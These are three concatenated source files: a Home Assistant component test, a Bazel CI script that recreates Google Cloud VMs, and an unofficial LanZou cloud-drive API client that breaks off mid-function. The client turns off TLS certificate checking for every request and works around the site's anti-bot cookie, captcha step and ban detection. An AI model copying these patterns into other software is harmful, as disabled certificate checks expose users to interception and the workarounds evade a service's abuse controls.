def test_disable_component_if_invalid_return(self):
"""Test disabling component if invalid return."""
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: None))
assert not bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is None
assert 'disabled_component' not in self.hass.config.components
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: False))
assert not bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is not None
assert 'disabled_component' not in self.hass.config.components
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: True))
assert bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is not None
assert 'disabled_component' in self.hass.config.components
|
create_instances.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import getpass
import queue
import re
import subprocess
import sys
import threading
DEBUG = True
LOCATION = 'europe-west1-d'
# Note that the hostnames are parsed and trigger specific behavior for different use cases.
# The following parts have a special meaning:
#
# - "buildkite": This is a normal production VM running the Buildkite agent.
# - "pipeline": This is a special production VM that only runs pipeline setup scripts.
# - "testing": This is a shared VM that can be used by project members for experiments.
# It does not run the Buildkite agent.
# - "$USER": This is a VM used by one specific engineer for tests. It does not run the Buildkite
# agent.
#
INSTANCE_GROUPS = {
'buildkite-ubuntu1404': {
'count': 8,
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=nvme',
},
'buildkite-ubuntu1604': {
'count': 8,
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=nvme',
},
'buildkite-windows': {
'count': 4,
'startup_script': 'startup-windows.ps1',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=scsi',
},
}
SINGLE_INSTANCES = {
'buildkite-pipeline-ubuntu1604': {
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-8',
'persistent_disk': 'buildkite-pipeline-persistent'
},
'testing-ubuntu1404': {
'image_family': 'buildkite-ubuntu1404',
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'persistent_disk': 'testing-ubuntu1404-persistent'
},
'testing-ubuntu1604': {
'image_family': 'buildkite-ubuntu1604',
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'persistent_disk': 'testing-ubuntu1604-persistent'
},
'testing-windows': {
'image_family': 'buildkite-windows',
'machine_type': 'n1-standard-32',
'boot_disk_size': '500GB'
},
'{}-ubuntu1404'.format(getpass.getuser()): {
'image_family': 'buildkite-ubuntu1404',
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=nvme',
},
'{}-ubuntu1604'.format(getpass.getuser()): {
'image_family': 'buildkite-ubuntu1604',
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=nvme',
},
'{}-windows'.format(getpass.getuser()): {
'image_family': 'buildkite-windows',
'startup_script': 'startup-windows.ps1',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=scsi',
}
}
PRINT_LOCK = threading.Lock()
WORK_QUEUE = queue.Queue()
def debug(*args, **kwargs):
if DEBUG:
print(*args, **kwargs)
def run(args, **kwargs):
debug('Running: {}'.format(' '.join(args)))
return subprocess.run(args, **kwargs)
def flags_for_instance(image_family, params):
cmd = ['--machine-type', params['machine_type']]
cmd.extend(['--network', 'buildkite'])
if 'startup_script' in params:
if 'windows' in image_family:
cmd.extend(['--metadata-from-file',
'windows-startup-script-ps1=' + params['startup_script']])
else:
cmd.extend(['--metadata-from-file', 'startup-script=' + params['startup_script']])
cmd.extend(['--min-cpu-platform', 'Intel Skylake'])
cmd.extend(['--boot-disk-type', 'pd-ssd'])
cmd.extend(['--boot-disk-size', params.get('boot_disk_size', '50GB')])
if 'local_ssd' in params:
cmd.extend(['--local-ssd', params['local_ssd']])
if 'persistent_disk' in params:
cmd.extend(['--disk',
'name={0},device-name={0},mode=rw,boot=no'.format(params['persistent_disk'])])
cmd.extend(['--image-project', 'bazel-public'])
cmd.extend(['--image-family', image_family])
cmd.extend(['--service-account', 'remote-account@bazel-public.iam.gserviceaccount.com'])
cmd.extend(['--scopes', 'cloud-platform'])
return cmd
def delete_instance_template(template_name):
cmd = ['gcloud', 'compute', 'instance-templates', 'delete', template_name, '--quiet']
result = run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
if result.returncode != 0:
# It's not an error if 'delete' failed, because the template didn't exist in the first place.
# But we do want to error out on other unexpected errors.
if not re.search(r'The resource .* was not found', result.stdout):
raise Exception('"gcloud compute instance-templates delete" returned unexpected error:\n{}'.format(result.stdout))
return result
def create_instance_template(template_name, image_family, params):
cmd = ['gcloud', 'compute', 'instance-templates', 'create', template_name]
cmd.extend(flags_for_instance(image_family, params))
run(cmd)
def delete_instance(instance_name):
cmd = ['gcloud', 'compute', 'instances', 'delete', '--quiet', instance_name]
result = run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
if result.returncode != 0:
# It's not an error if 'delete' failed, because the template didn't exist in the first place.
# But we do want to error out on other unexpected errors.
if not re.search(r'The resource .* was not found', result.stdout):
raise Exception('"gcloud compute instance delete" returned unexpected error:\n{}'.format(result.stdout))
return result
def create_instance(instance_name, image_family, params):
cmd = ['gcloud', 'compute', 'instances', 'create', instance_name]
cmd.extend(['--zone', LOCATION])
cmd.extend(flags_for_instance(image_family, params))
run(cmd)
def delete_instance_group(instance_group_name):
cmd = ['gcloud', 'compute', 'instance-groups', 'managed', 'delete', instance_group_name]
cmd.extend(['--zone', LOCATION])
cmd.extend(['--quiet'])
result = run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
if result.returncode != 0:
# It's not an error if 'delete' failed, because the template didn't exist in the first place.
# But we do want to error out on other unexpected errors.
if not re.search(r'The resource .* was not found', result.stdout):
raise Exception('"gcloud compute instance-groups managed delete" returned unexpected error:\n{}'.format(result.stdout))
return result
def create_instance_group(instance_group_name, template_name, count):
cmd = ['gcloud', 'compute', 'instance-groups', 'managed', 'create', instance_group_name]
cmd.extend(['--zone', LOCATION])
cmd.extend(['--base-instance-name', instance_group_name])
cmd.extend(['--template', template_name])
cmd.extend(['--size', str(count)])
return run(cmd)
def instance_group_task(instance_group_name, params):
image_family = params.get('image_family', instance_group_name)
template_name = instance_group_name + '-template'
if delete_instance_group(instance_group_name).returncode == 0:
print('Deleted existing instance group: {}'.format(instance_group_name))
if delete_instance_template(template_name).returncode == 0:
print('Deleted existing VM template: {}'.format(template_name))
create_instance_template(template_name, image_family, params)
create_instance_group(instance_group_name, template_name, params['count'])
def single_instance_task(instance_name, params):
image_family = params.get('image_family', instance_name)
if delete_instance(instance_name).returncode == 0:
print('Deleted existing instance: {}'.format(instance_name))
create_instance(instance_name, image_family, params)
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
if 'instance_group_name' in item:
instance_group_task(**item)
elif 'instance_name' in item:
single_instance_task(**item)
else:
raise Exception('Unknown task: {}'.format(item))
finally:
WORK_QUEUE.task_done()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
# Put VM creation instructions into the work queue.
for instance_group_name, params in INSTANCE_GROUPS.items():
# If the user specified instance (group) names on the command-line, we process only these
# instances, otherwise we process all.
if argv and instance_group_name not in argv:
continue
# Do not automatically create user-specific instances. These must be specified explicitly
# on the command-line.
if instance_group_name.startswith(getpass.getuser()) and instance_group_name not in argv:
continue
WORK_QUEUE.put({
'instance_group_name': instance_group_name,
'params': params
})
for instance_name, params in SINGLE_INSTANCES.items():
# If the user specified instance (group) names on the command-line, we process only these
# instances, otherwise we process all.
if argv and instance_name not in argv:
continue
# Do not automatically create user-specific instances. These must be specified explicitly
# on the command-line.
if instance_name.startswith(getpass.getuser()) and instance_name not in argv:
continue
WORK_QUEUE.put({
'instance_name': instance_name,
'params': params
})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == '__main__':
sys.exit(main())
|
core.py
|
"""
蓝奏网盘 API,封装了对蓝奏云的各种操作,解除了上传格式、大小限制
"""
import os
import pickle
import re
import shutil
from threading import Thread
from time import sleep
from datetime import datetime
from urllib3 import disable_warnings
from random import shuffle, uniform
from typing import List, Tuple
from concurrent.futures import ThreadPoolExecutor, as_completed
import requests
from requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor
from urllib3.exceptions import InsecureRequestWarning
from lanzou.api.models import FileList, FolderList
from lanzou.api.types import *
from lanzou.api.utils import *
from lanzou.debug import logger
__all__ = ['LanZouCloud']
class LanZouCloud(object):
FAILED = -1
SUCCESS = 0
ID_ERROR = 1
PASSWORD_ERROR = 2
LACK_PASSWORD = 3
ZIP_ERROR = 4
MKDIR_ERROR = 5
URL_INVALID = 6
FILE_CANCELLED = 7
PATH_ERROR = 8
NETWORK_ERROR = 9
CAPTCHA_ERROR = 10
OFFICIAL_LIMITED = 11
def __init__(self):
self._session = requests.Session()
self._timeout = 5 # 每个请求的超时(不包含下载响应体的用时)
self._max_size = 100 # 单个文件大小上限 MB
self._upload_delay = (0, 0) # 文件上传延时
self._host_url = 'https://www.lanzoub.com'
self._doupload_url = 'https://pc.woozooo.com/doupload.php'
self._account_url = 'https://pc.woozooo.com/account.php'
self._mydisk_url = 'https://pc.woozooo.com/mydisk.php'
self._cookies = None
self._headers = {
'User-Agent': USER_AGENT,
'Referer': self._mydisk_url,
'Accept-Language': 'zh-CN,zh;q=0.9', # 提取直连必需设置这个,否则拿不到数据
}
disable_warnings(InsecureRequestWarning) # 全局禁用 SSL 警告
Thread(target=self._choose_lanzou_host).start()
def _get(self, url, **kwargs):
try:
kwargs.setdefault('timeout', self._timeout)
kwargs.setdefault('headers', self._headers)
return self._session.get(url, verify=False, **kwargs)
except requests.Timeout:
logger.warning("Encountered timeout error while requesting network!")
raise TimeoutError
except (requests.RequestException, Exception) as e:
logger.error(f"Unexpected error: e={e}")
def _post(self, url, data, **kwargs):
try:
kwargs.setdefault('timeout', self._timeout)
kwargs.setdefault('headers', self._headers)
return self._session.post(url, data, verify=False, **kwargs)
except requests.Timeout:
logger.warning("Encountered timeout error while requesting network!")
raise TimeoutError
except (requests.RequestException, Exception) as e:
logger.error(f"Unexpected error: e={e}")
def _get_response_host(self, info):
"""获取蓝奏响应的下载 host 域名"""
new_host = info.get("is_newd", "")
if new_host and new_host != self._host_url:
self._host_url = new_host
def _choose_lanzou_host(self):
"""选择一个可用的蓝奏域名"""
hosts = ("lanzoub", "lanzouw", "lanzoui")
for i in hosts:
host = f"https://www.{i}.com"
try:
requests.get(host, headers=self._headers, timeout=3, verify=False)
self._host_url = host
break
except:
pass
def set_max_size(self, max_size=100) -> int:
"""设置单文件大小限制(会员用户可超过 100M)"""
if max_size < 1:
return LanZouCloud.FAILED
self._max_size = max_size
return LanZouCloud.SUCCESS
def set_upload_delay(self, t_range: tuple) -> int:
"""设置上传大文件数据块时,相邻两次上传之间的延时,减小被封号的可能"""
if 0 <= t_range[0] <= t_range[1]:
self._upload_delay = t_range
return LanZouCloud.SUCCESS
return LanZouCloud.FAILED
def login(self, username, passwd) -> int:
"""
登录蓝奏云控制台已弃用]
对某些用户可能有用
"""
self._session.cookies.clear()
login_data = {"task": 3, "setSessionId": "", "setToken": "", "setSig": "",
"setScene": "", "uid": username, "pwd": passwd}
phone_header = {
"User-Agent": "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4051.0 Mobile Safari/537.36"}
html = self._get(self._account_url)
if not html:
return LanZouCloud.NETWORK_ERROR
formhash = re.findall(r'name="formhash" value="(.+?)"', html.text)
if not formhash:
logger.error("formhash is None!")
return LanZouCloud.FAILED
login_data['formhash'] = formhash[0]
html = self._post(self._mydisk_url, login_data, headers=phone_header)
if not html:
return LanZouCloud.NETWORK_ERROR
try:
if '成功' in html.json()['info']:
self._cookies = html.cookies.get_dict()
self._session.cookies.update(self._cookies)
return LanZouCloud.SUCCESS
except ValueError:
pass
return LanZouCloud.FAILED
def get_cookie(self) -> dict:
"""获取用户 Cookie"""
return self._cookies
def login_by_cookie(self, cookie: dict) -> int:
"""通过cookie登录"""
self._session.cookies.update(cookie)
html = self._get(self._account_url)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.FAILED if '网盘用户登录' in html.text else LanZouCloud.SUCCESS
def logout(self) -> int:
"""注销"""
html = self._get(self._account_url, params={'action': 'logout'})
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '退出系统成功' in html.text else LanZouCloud.FAILED
def delete(self, fid, is_file=True) -> int:
"""把网盘的文件、无子文件夹的文件夹放到回收站"""
post_data = {'task': 6, 'file_id': fid} if is_file else {'task': 3, 'folder_id': fid}
result = self._post(self._doupload_url, post_data)
if not result:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if result.json()['zt'] == 1 else LanZouCloud.FAILED
def clean_rec(self) -> int:
"""清空回收站"""
post_data = {'action': 'delete_all', 'task': 'delete_all'}
html = self._get(self._mydisk_url, params={'item': 'recycle', 'action': 'files'})
if not html:
return LanZouCloud.NETWORK_ERROR
post_data['formhash'] = re.findall(r'name="formhash" value="(.+?)"', html.text)[0] # 设置表单 hash
html = self._post(self._mydisk_url + '?item=recycle', post_data)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '清空回收站成功' in html.text else LanZouCloud.FAILED
def get_rec_dir_list(self) -> FolderList:
"""获取回收站文件夹列表"""
# 回收站中文件(夹)名只能显示前 17 个中文字符或者 34 个英文字符,如果这些字符相同,则在文件(夹)名后添加 (序号) ,以便区分
html = self._get(self._mydisk_url, params={'item': 'recycle', 'action': 'files'})
if not html:
return FolderList()
dirs = re.findall(r'folder_id=(\d+).+?> (.+?)\.{0,3}</a>.*\n+.*<td.+?>(.+?)</td>.*\n.*<td.+?>(.+?)</td>',
html.text)
all_dir_list = FolderList() # 文件夹信息列表
dir_name_list = [] # 文件夹名列表d
counter = 1 # 重复计数器
for fid, name, size, time in dirs:
if name in dir_name_list: # 文件夹名前 17 个中文或 34 个英文重复
counter += 1
name = f'{name}({counter})'
else:
counter = 1
dir_name_list.append(name)
all_dir_list.append(RecFolder(name, int(fid), size, time, None))
return all_dir_list
def get_rec_file_list(self, folder_id=-1) -> FileList:
"""获取回收站文件列表"""
if folder_id == -1: # 列出回收站根目录文件
# 回收站文件夹中的文件也会显示在根目录
html = self._get(self._mydisk_url, params={'item': 'recycle', 'action': 'files'})
if not html:
return FileList()
html = remove_notes(html.text)
files = re.findall(
r'fl_sel_ids[^\n]+value="(\d+)".+?filetype/(\w+)\.gif.+?/>\s?(.+?)(?:\.{3})?</a>.+?<td.+?>([\d\-]+?)</td>',
html, re.DOTALL)
file_list = FileList()
file_name_list = []
counter = 1
for fid, ftype, name, time in sorted(files, key=lambda x: x[2]):
if not name.endswith(ftype): # 防止文件名太长导致丢失了文件后缀
name = name + '.' + ftype
if name in file_name_list: # 防止长文件名前 17:34 个字符相同重名
counter += 1
name = f'{name}({counter})'
else:
counter = 1
file_name_list.append(name)
file_list.append(RecFile(name, int(fid), ftype, size='', time=time))
return file_list
else: # 列出回收站中文件夹内的文件,信息只有部分文件名和文件大小
para = {'item': 'recycle', 'action': 'folder_restore', 'folder_id': folder_id}
html = self._get(self._mydisk_url, params=para)
if not html or '此文件夹没有包含文件' in html.text:
return FileList()
html = remove_notes(html.text)
files = re.findall(
r'com/(\d+?)".+?filetype/(\w+)\.gif.+?/> (.+?)(?:\.{3})?</a> <font color="#CCCCCC">\((.+?)\)</font>',
html)
file_list = FileList()
file_name_list = []
counter = 1
for fid, ftype, name, size in sorted(files, key=lambda x: x[2]):
if not name.endswith(ftype): # 防止文件名太长丢失后缀
name = name + '.' + ftype
if name in file_name_list:
counter += 1
name = f'{name}({counter})' # 防止文件名太长且前17个字符重复
else:
counter = 1
file_name_list.append(name)
file_list.append(RecFile(name, int(fid), ftype, size=size, time=''))
return file_list
def get_rec_all(self):
"""获取整理后回收站的所有信息"""
root_files = self.get_rec_file_list() # 回收站根目录文件列表
folder_list = FolderList() # 保存整理后的文件夹列表
for folder in self.get_rec_dir_list(): # 遍历所有子文件夹
this_folder = RecFolder(folder.name, folder.id, folder.size, folder.time, FileList())
for file in self.get_rec_file_list(folder.id): # 文件夹内的文件属性: name,id,type,size
if root_files.find_by_id(file.id): # 根目录存在同名文件
file_time = root_files.pop_by_id(file.id).time # 从根目录删除, time 信息用来补充文件夹中的文件
file = file._replace(time=file_time) # 不能直接更新 namedtuple, 需要 _replace
this_folder.files.append(file)
else: # 根目录没有同名文件(用户手动删了),文件还在文件夹中,只是根目录不显示,time 信息无法补全了
file = file._replace(time=folder.time) # 那就设置时间为文件夹的创建时间
this_folder.files.append(file)
folder_list.append(this_folder)
return root_files, folder_list
def delete_rec(self, fid, is_file=True) -> int:
"""彻底删除回收站文件(夹)"""
# 彻底删除后需要 1.5s 才能调用 get_rec_file() ,否则信息没有刷新,被删掉的文件似乎仍然 "存在"
if is_file:
para = {'item': 'recycle', 'action': 'file_delete_complete', 'file_id': fid}
post_data = {'action': 'file_delete_complete', 'task': 'file_delete_complete', 'file_id': fid}
else:
para = {'item': 'recycle', 'action': 'folder_delete_complete', 'folder_id': fid}
post_data = {'action': 'folder_delete_complete', 'task': 'folder_delete_complete', 'folder_id': fid}
html = self._get(self._mydisk_url, params=para)
if not html:
return LanZouCloud.NETWORK_ERROR
# 此处的 formhash 与 login 时不同,不要尝试精简这一步
post_data['formhash'] = re.findall(r'name="formhash" value="(\w+?)"', html.text)[0] # 设置表单 hash
html = self._post(self._mydisk_url + '?item=recycle', post_data)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '删除成功' in html.text else LanZouCloud.FAILED
def delete_rec_multi(self, files, folders) -> int:
"""彻底删除回收站多个文件(夹)"""
# 与 recovery_all 几乎一样,task 表单值不一样
if not files and not folders:
return LanZouCloud.FAILED
para = {'item': 'recycle', 'action': 'files'}
post_data = {'action': 'files', 'task': 'delete_complete_recycle'}
if folders:
post_data['fd_sel_ids[]'] = folders
if files:
post_data['fl_sel_ids[]'] = files
html = self._get(self._mydisk_url, params=para)
if not html:
return LanZouCloud.NETWORK_ERROR
post_data['formhash'] = re.findall(r'name="formhash" value="(\w+?)"', html.text)[0] # 设置表单 hash
html = self._post(self._mydisk_url + '?item=recycle', post_data)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '删除成功' in html.text else LanZouCloud.FAILED
def recovery(self, fid, is_file=True) -> int:
"""从回收站恢复文件"""
if is_file:
para = {'item': 'recycle', 'action': 'file_restore', 'file_id': fid}
post_data = {'action': 'file_restore', 'task': 'file_restore', 'file_id': fid}
else:
para = {'item': 'recycle', 'action': 'folder_restore', 'folder_id': fid}
post_data = {'action': 'folder_restore', 'task': 'folder_restore', 'folder_id': fid}
html = self._get(self._mydisk_url, params=para)
if not html:
return LanZouCloud.NETWORK_ERROR
post_data['formhash'] = re.findall(r'name="formhash" value="(\w+?)"', html.text)[0] # 设置表单 hash
html = self._post(self._mydisk_url + '?item=recycle', post_data)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '恢复成功' in html.text else LanZouCloud.FAILED
def recovery_multi(self, files, folders) -> int:
"""从回收站恢复多个文件(夹)"""
if not files and not folders:
return LanZouCloud.FAILED
para = {'item': 'recycle', 'action': 'files'}
post_data = {'action': 'files', 'task': 'restore_recycle'}
if folders:
post_data['fd_sel_ids[]'] = folders
if files:
post_data['fl_sel_ids[]'] = files
html = self._get(self._mydisk_url, params=para)
if not html:
return LanZouCloud.NETWORK_ERROR
post_data['formhash'] = re.findall(r'name="formhash" value="(.+?)"', html.text)[0] # 设置表单 hash
html = self._post(self._mydisk_url + '?item=recycle', post_data)
if not html:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '恢复成功' in html.text else LanZouCloud.FAILED
def recovery_all(self) -> int:
"""从回收站恢复所有文件(夹)"""
para = {'item': 'recycle', 'action': 'restore_all'}
post_data = {'action': 'restore_all', 'task': 'restore_all'}
first_page = self._get(self._mydisk_url, params=para)
if not first_page:
return LanZouCloud.NETWORK_ERROR
post_data['formhash'] = re.findall(r'name="formhash" value="(.+?)"', first_page.text)[0] # 设置表单 hash
second_page = self._post(self._mydisk_url + '?item=recycle', post_data)
if not second_page:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if '还原成功' in second_page.text else LanZouCloud.FAILED
def get_file_list(self, folder_id=-1) -> FileList:
"""获取文件列表"""
page = 1
file_list = FileList()
while True:
post_data = {'task': 5, 'folder_id': folder_id, 'pg': page}
resp = self._post(self._doupload_url, post_data)
if not resp: # 网络异常,重试
continue
else:
resp = resp.json()
if resp["info"] == 0:
break # 已经拿到了全部的文件信息
else:
page += 1 # 下一页
# 文件信息处理
if resp["zt"] == 9: # login not
logger.debug(f"Not login resp={resp}")
break
for file in resp["text"]:
file_list.append(File(
id=int(file['id']),
name=file['name_all'].replace("&", "&"),
time=file['time'], # 上传时间
size=file['size'].replace(",", ""), # 文件大小
type=file['name_all'].split('.')[-1], # 文件类型
downs=int(file['downs']), # 下载次数
has_pwd=True if int(file['onof']) == 1 else False, # 是否存在提取码
has_des=True if int(file['is_des']) == 1 else False # 是否存在描述
))
return file_list
def get_dir_list(self, folder_id=-1) -> Tuple[FolderList, FolderList]:
"""获取子文件夹列表与全路径"""
folder_list = FolderList()
path_list = FolderList()
post_data = {'task': 47, 'folder_id': folder_id}
resp = self._post(self._doupload_url, post_data)
if resp:
resp = resp.json()
for folder in resp["text"]:
if "fol_id" not in folder: # 切换用户时,有可能得到的是一个字符串 (╥╯^╰╥)
continue
folder_list.append(Folder(
id=int(folder['fol_id']),
name=folder['name'],
has_pwd=True if int(folder['onof']) == 1 else False,
desc=folder['folder_des'][1:-1]
))
if folder_id == -1 or resp["info"]: # 如果 folder_id 有误,就返回空 list
path_list.append(FolderId('LanZouCloud', -1, '根目录', -1))
for folder in resp["info"]:
if "folderid" not in folder:
continue
path_list.append(FolderId(
name=folder['name'],
id=int(folder['folderid']),
desc=folder['folder_des'][1:-1],
now=int(folder['now'])
))
return folder_list, path_list
def clean_ghost_folders(self):
"""清除网盘中的幽灵文件夹"""
# 可能有一些文件夹,网盘和回收站都看不见它,但是它确实存在,移动文件夹时才会显示
# 如果不清理掉,不小心将文件移动进去就完蛋了
def _clean(fid):
for folder in self.get_dir_list(fid):
real_folders.append(folder)
_clean(folder.id)
folder_with_ghost = self.get_move_folders()
folder_with_ghost.pop_by_id(-1) # 忽视根目录
real_folders = FolderList()
_clean(-1)
for folder in folder_with_ghost:
if not real_folders.find_by_id(folder.id):
logger.debug(f"Delete ghost folder: {folder.name} #{folder.id}")
if self.delete(folder.id, False) != LanZouCloud.SUCCESS:
return LanZouCloud.FAILED
if self.delete_rec(folder.id, False) != LanZouCloud.SUCCESS:
return LanZouCloud.FAILED
return LanZouCloud.SUCCESS
def get_file_info_by_url(self, share_url, pwd='') -> FileDetail:
"""获取文件各种信息(包括下载直链)
:param share_url: 文件分享链接
:param pwd: 文件提取码(如果有的话)
"""
prop_host = re.sub(r"lanzou(\w)", "lanzoub", self._host_url)
share_url = re.sub(r"lanzou(\w)", "lanzoub", share_url)
if not is_file_url(share_url): # 非文件链接返回错误
return FileDetail(LanZouCloud.URL_INVALID, pwd=pwd, url=share_url)
first_page = self._get(share_url) # 文件分享页面(第一页)
if not first_page:
return FileDetail(LanZouCloud.NETWORK_ERROR, pwd=pwd, url=share_url)
if "acw_sc__v2" in first_page.text:
# 在页面被过多访问或其他情况下,有时候会先返回一个加密的页面,其执行计算出一个acw_sc__v2后放入页面后再重新访问页面才能获得正常页面
# 若该页面进行了js加密,则进行解密,计算acw_sc__v2,并加入cookie
acw_sc__v2 = calc_acw_sc__v2(first_page.text)
self._session.cookies.set("acw_sc__v2", acw_sc__v2)
logger.debug(f"Set Cookie: acw_sc__v2={acw_sc__v2}")
first_page = self._get(share_url) # 文件分享页面(第一页)
if not first_page:
return FileDetail(LanZouCloud.NETWORK_ERROR, pwd=pwd, url=share_url)
first_page = remove_notes(first_page.text) # 去除网页里的注释
if '文件取消' in first_page or '文件不存在' in first_page:
return FileDetail(LanZouCloud.FILE_CANCELLED, pwd=pwd, url=share_url)
# 这里获取下载直链 304 重定向前的链接
if 'id="pwdload"' in first_page or 'id="passwddiv"' in first_page or '输入密码' in first_page: # 文件设置了提取码时
if len(pwd) == 0:
return FileDetail(LanZouCloud.LACK_PASSWORD, pwd=pwd, url=share_url) # 没给提取码直接退出
# data : 'action=downprocess&sign=AGZRbwEwU2IEDQU6BDRUaFc8DzxfMlRjCjTPlVkWzFSYFY7ATpWYw_c_c&p='+pwd,
sign = re.search(r"sign=(\w+?)&", first_page)
sign = sign.group(1) if sign else ""
post_data = {'action': 'downprocess', 'sign': sign, 'p': pwd}
link_info = self._post(prop_host + '/ajaxm.php', post_data) # 保存了重定向前的链接信息和文件名
second_page = self._get(share_url) # 再次请求文件分享页面,可以看见文件名,时间,大小等信息(第二页)
if not link_info or not second_page.text:
return FileDetail(LanZouCloud.NETWORK_ERROR, pwd=pwd, url=share_url)
link_info = link_info.json()
second_page = remove_notes(second_page.text)
# 提取文件信息
f_name = link_info['inf'].replace("*", "_")
f_size = re.search(r'大小.+?(\d[\d\.,]+\s?[BKM]?)<', second_page)
f_size = f_size.group(1) if f_size else ''
f_time = re.search(r'class="n_file_infos">(.+?)</span>', second_page)
f_time = f_time.group(1) if f_time else ''
f_desc = re.search(r'class="n_box_des">(.*?)</div>', second_page)
f_desc = f_desc.group(1) if f_desc else ''
else: # 文件没有设置提取码时,文件信息都暴露在分享页面上
para = re.search(r'<iframe.*?src="(.+?)"', first_page).group(1) # 提取下载页面 URL 的参数
logger.debug("params",para)
# 文件名位置变化很多
f_name = re.search(r"<title>(.+?) - 蓝奏云</title>", first_page) or \
re.search(r'<div class="filethetext".+?>([^<>]+?)</div>', first_page) or \
re.search(r'<div style="font-size.+?>([^<>].+?)</div>', first_page) or \
re.search(r"var filename = '(.+?)';", first_page) or \
re.search(r'id="filenajax">(.+?)</div>', first_page) or \
re.search(r'<div class="b"><span>([^<>]+?)</span></div>', first_page)
f_name = f_name.group(1) if f_name else "未匹配到文件名"
f_time = re.search(r'>(\d+\s?[秒天分小][钟时]?前|[昨前]天\s?[\d:]+?|\d+\s?天前|\d{4}-\d\d-\d\d)<', first_page)
f_time = f_time.group(1) if f_time else ''
f_size = re.search(r'大小.+?(\d[\d\.,]+\s?[BKM]?)<', first_page) or \
re.search(r'大小:(.+?)</div>', first_page) # VIP 分享页面
f_size = f_size.group(1) if f_size else ''
f_desc = re.search(r'文件描述.+?</span><br>\n?\s*(.*?)\s*</td>', first_page)
f_desc = f_desc.group(1) if f_desc else ''
logger.debug("params get",prop_host)
first_page = self._get(prop_host + para)
if not first_page:
return FileDetail(LanZouCloud.NETWORK_ERROR, name=f_name, time=f_time, size=f_size, desc=f_desc, pwd=pwd, url=share_url)
first_page = remove_notes(first_page.text)
# 一般情况 sign 的值就在 data 里,有时放在变量后面
sign = re.search(r"'sign':(.+?),", first_page).group(1)
if len(sign) < 20: # 此时 sign 保存在变量里面, 变量名是 sign 匹配的字符
sign = re.search(rf"var {sign}\s*=\s*'(.+?)';", first_page).group(1)
post_data = {'action': 'downprocess', 'sign': sign, 'ves': 1}
link_info = self._post(prop_host + '/ajaxm.php', post_data)
if not link_info:
return FileDetail(LanZouCloud.NETWORK_ERROR, name=f_name, time=f_time, size=f_size, desc=f_desc, pwd=pwd, url=share_url)
link_info = link_info.json()
# 这里开始获取文件直链
if link_info['zt'] != 1: # 返回信息异常,无法获取直链
return FileDetail(LanZouCloud.FAILED,
name=f_name, time=f_time, size=f_size,
desc=f_desc, pwd=pwd, url=share_url)
fake_url = link_info['dom'] + '/file/' + link_info['url'] # 假直连,存在流量异常检测
download_page = self._get(fake_url, allow_redirects=False)
if not download_page:
return FileDetail(LanZouCloud.NETWORK_ERROR,
name=f_name, time=f_time, size=f_size,
desc=f_desc, pwd=pwd, url=share_url)
download_page.encoding = 'utf-8'
download_page_html = remove_notes(download_page.text)
if '网络异常' not in download_page_html: # 没有遇到验证码
direct_url = download_page.headers['Location'] # 重定向后的真直链
else: # 遇到验证码,验证后才能获取下载直链
file_token = re.findall("'file':'(.+?)'", download_page_html)[0]
file_sign = re.findall("'sign':'(.+?)'", download_page_html)[0]
check_api = 'https://vip.d0.baidupan.com/file/ajax.php'
post_data = {'file': file_token, 'el': 2, 'sign': file_sign}
sleep(2) # 这里必需等待2s, 否则直链返回 ?SignError
resp = self._post(check_api, post_data)
direct_url = resp.json()['url']
if not direct_url:
return FileDetail(LanZouCloud.CAPTCHA_ERROR,
name=f_name, time=f_time, size=f_size,
desc=f_desc, pwd=pwd, url=share_url)
